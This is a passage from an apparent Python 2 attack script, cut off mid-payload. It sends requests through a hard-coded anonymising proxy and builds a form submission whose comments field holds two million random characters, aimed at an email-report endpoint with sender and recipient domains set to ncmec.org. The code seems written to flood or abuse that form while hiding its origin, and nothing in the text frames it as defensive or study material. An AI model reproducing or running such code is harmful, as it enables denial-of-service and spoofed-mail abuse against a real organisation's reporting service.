"op" : "Send"

'''
'''proxy = urllib2.ProxyHandler({'http': '119.148.9.130:8080'})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)

lis 	= list(ascii_lowercase)
big 	= ''.join(choice(lis) for _ in xrange(2000000)) 
data = urllib.urlencode({
		"LanguageId":"en_US",
		"_01_name":"hgfh",
		"_02_email":"*****@*****.**",
		"_03_comments": big,
		"action":"sendEmailReport",
		"cc":"",
		"fromDomain":"ncmec.org",
		"fromName":"servlet",
		"mailtoDomain":"ncmec.org",